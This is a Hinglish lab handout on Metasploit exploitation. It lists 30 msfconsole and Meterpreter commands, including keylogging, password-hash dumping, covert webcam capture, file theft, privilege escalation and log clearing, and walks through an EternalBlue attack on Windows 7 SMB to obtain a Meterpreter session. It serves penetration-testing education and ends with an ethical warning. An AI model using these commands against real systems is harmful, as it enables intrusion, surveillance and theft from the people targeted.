LAB 10

Metasploit Exploitation Manual

Target systems ki vulnerabilities ko exploit karke unauthorized access lena.

30 Essential MSF Commands

Hacking start karne se pehle ye commands aapki "Cheat Sheet" hain.

Command Kyu Use Karein? (Action)
msfconsoleFramework ko start karne ke liye.
search [exploit_name]Vulnerability dhundne ke liye (e.g., search smb).
use [path/to/module]Select kiya hua exploit activate karna.
show optionsRHOST, LHOST settings check karna.
set RHOSTS [Target_IP]Target machine ka IP set karna.
set LHOST [Your_IP]Apna machine (Attacker) ka IP set karna.
exploit / runAttack ko execute karna.
sessions -lSare active hacked sessions ki list dekhna.
sessions -i [ID]Kisi specific hacked session me enter karna.
backgroundSession se bahar aana (Bina use band kiye).
getuidCheck karna aap kaunse user ho (Meterpreter).
sysinfoTarget PC ka OS aur architecture check karna.
screenshotTarget PC ki screen ka live photo lena.
keyscan_startKeylogger shuru karna (Sab record hoga).
keyscan_dumpType kiye huye passwords dekhna.
hashdumpDatabase se passwords (hashes) nikalna.
shellTarget ka normal CMD prompt open karna.
upload [file_path]Target PC par koi file/virus bhejna.
download [file_path]Target PC se koi file churana.
psTarget par chal rahe sare apps dekhna.
migrate [PID]Hiding: Apne aap ko safe app me hide karna.
clearevApne footprints (logs) mita dena.
webcam_listTarget ke webcams ki list dekhna.
webcam_snapTarget ke camera se bina bataye photo lena.
getsystemNormal user se Admin/System user banna.
pwdCheck karna aap target ke kaunse folder me ho.
lsTarget folder ki saari files dekhna.
search -f *.pdfTarget ke PC par PDF files dhundna.
rebootTarget PC ko restart kar dena.
exitSession band karke bahar aana.

Step 1: Target Scanning

Sabse pehle Nmap se service version pata karein. Agar target Windows 7 hai aur SMB port khula hai, toh ye vulnerable ho sakta hai.

search eternalblue

Step 2: Configuring Exploit

Select karne ke baad parameters set karein. Hamesha dhyan rakhein ki LHOST aapka IP hai aur RHOST target ka.

Logic: Exploit wo rasta hai jisse hum andar ghuste hain, aur Payload (Meterpreter) wo agent hai jo andar ja kar hamara kaam karta hai.

Step 3: Gaining Access

Exploit command run karein. Agar everything is right, aapko meterpreter prompt mil jayega.

exploit

Ab aap screenshot ya keyscan_start chala kar data collect kar sakte hain.

Ethical Warning

Metasploit ek khatarnak weapon hai. Ise sirf apne local labs (VirtualBox) me ya authorized testing ke liye hi use karein. Dusro ke devices par chalana illegal hai.